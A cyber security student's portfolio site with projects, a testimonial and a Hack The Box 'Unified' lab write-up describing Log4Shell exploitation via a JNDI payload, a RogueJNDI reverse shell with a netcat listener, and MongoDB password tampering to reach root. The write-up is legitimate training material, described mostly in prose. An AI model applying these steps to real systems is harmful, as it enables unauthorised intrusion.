Final-year BSc (Hons) Cyber Security at Sheffield Hallam University. I've made a blog to track my journey and help other people, focusing on penetration testing, DFIR, and secure network administration.
I'm a final-year Cyber Security student passionate about penetration testing, digital forensics, and secure systems. I document my progress through projects, write‑ups, and Hack The Box labs. Currently completing my final year at Sheffield Hallam University, I continue to sharpen my skills and share insights to help others on a similar journey.
Hands-on technical and consultancy projects from my degree and personal work.
Collaborated with CyberFirst to digitise a physical Enigma-based education game. Built a game in unity teaching Morse, Caesar, and Enigma principles; presented to 200+ students and industry guests.
Delivered a consultancy-style threat intel report using OSINT and MITRE ATT&CK, profiling threat actor TTPs targeting the education sector and producing recommendations for SOC operations.
Deployed hybrid Windows/Linux infrastructure with ADDS, DNS, DHCP and Group Policy. Configured Cisco routing & switching (VLANs, ACLs, OSPF with MD5) for enterprise‑style security.
Exploited Apache Tika RCE and AlwaysInstallElevated misconfig to escalate privileges; analysed PCAPs in Wireshark/Security Onion to detect suspicious malware.
Core certifications (earned & in progress) and technical skills.
Sheffield Hallam University • Final year student averaging a 2:1. Modules include Ethical Hacking, Secure Network Admin, Database Security, and Project‑Based Learning.
Built an interactive cryptography experience teaching Enigma, Caesar cipher, and Morse code; delivered to secondary school students.
Produced a GOV client report using OSINT and MITRE ATT&CK, focused on threats to the education sector.
Configured Windows/Linux services (ADDS, DNS, DHCP, GPO) and Cisco networking (VLANs, ACLs, OSPF MD5).
Assessment labs covering exploitation (Apache Tika RCE, AlwaysInstallElevated) and network forensics (DarkGate indicators, IoT scanning).
Head of Computing and Online Safety at Kings Priory School, CyberFirst Operations Lead for North East and Yorkshire, COO Kings Priory Digital
I had the pleasure of working with Taylor on a fantastic project where he and his team digitised the already fascinating experience of Operation Enigma for secondary school pupils. As part of the team, Taylor played a key role in transforming this historic topic into an engaging and interactive digital format that captured students’ interest and curiosity.
Throughout the project, Taylor demonstrated excellent teamwork, creativity, and technical skill. He worked collaboratively to ensure the final product was both educational and accessible, showing real initiative in overcoming challenges and enhancing the user experience.
What impressed me most was Taylor’s ability to balance the technical aspects of the project with a strong understanding of the audience, ensuring that the digitised experience not only communicated the historical significance of Operation Enigma but also inspired and excited the students who engaged with it.
Today I set up this website to track my cybersecurity journey. I'm currently working through all Hack The Box Starting Point tiers (Tier 0, Tier 1, and Tier 2). On this day, I completed the Tier 2 lab called Unified. Below is a detailed summary of how I completed it:
I launched the machine, connected via the VPN, and verified connectivity by pinging the target IP.
Initially, browsing to the IP gave nothing, so I ran an nmap -A scan. This revealed ports 22, 6789, 8080, and 8443 open. On port 8443 I found a UniFi login portal.
Based on the UniFi version, I found it was vulnerable to Log4Shell (CVE-2021-44228). This affects the remember parameter in login requests.
Using Burp Suite, I intercepted a login request, modified the remember parameter with a JNDI payload, and confirmed the target attempted an LDAP lookup to my controlled host (visible in tcpdump).
I set up RogueJNDI and crafted a Base64‑encoded Bash reverse shell payload. After starting a listener with nc -lvp 4444, I triggered the exploit and received a reverse shell on the target.
Enumerating the filesystem, I located and captured the user.txt flag in Michael’s home directory.
Checking running processes revealed MongoDB on port 27117. The UniFi application stores credentials in the ace database. I updated the admin password to Password1234 using Mongo commands, then re‑hashed it with SHA‑512 to match the format. This allowed me to log into the UniFi admin dashboard in the browser.
From the dashboard, I found SSH credentials: root:NotACrackablePassword4U2022. Using SSH I logged in as root and captured the final root.txt flag.
This challenge taught me a lot about exploiting Log4j (Log4Shell), using RogueJNDI, and leveraging MongoDB to escalate privileges. It was a solid Tier 2 box combining reconnaissance, web exploitation, and post‑exploitation skills.
This form sends straight to my ProtonMail inbox (no email app opens).
If you see any issues, you can still email me directly at taylorbetreenn@protonmail.com
-----BEGIN PGP PUBLIC KEY BLOCK----- mDMEZ4V1uBYJKwYBBAHaRw8BAQdAqmb4qV20WPTxvwC+ci1e+LxQtpuJMC2se2So DULZsn60J1RheWxvciBCZXRyZWVuIDx0YXlsb3JiZXRyZW5uQHByb3Rvbm1haWwu y29tPoiQBBMWCAA4FiEEFi0RUsPy3sx2hrojWuswKrntgWIFAmuFdbgCGwMFCwkI BwIGFQoJCAsCBBYCAwECHgECF4AACgkQWuswKrntgWLo1QD+LpOUX6UXIJS3jxlH WFF1B8M9hYAbToAvU6OEpV4je/QA/A9pUM3mVFlC2jGxVZkYMmmKg2xUbd3xO0Br Bq3MIhXzuDgEZ4V1uBIKKwYBBAGXVQEFAQEHQImAYIh1lLVZ4cQmmnZhsyVQG9Dr clnAGoVFFQGRISZvAwEIB4h4BBgWCAAgFiEEFi0RUsPy3sx2hrojWuswKrntgWIF AmuFdbgCGwwACgkQWuswKrntgWKEVwD+Mfjym8bYHuYW2JjOjeR0gfNc1pMSi+xD HIGbhuX5suUAtF8A/RDFMP+Di6JezYqRRY5dOXcMiiRGLFC4rZcDOPqDBgYJ =5wrX -----END PGP PUBLIC KEY BLOCK-----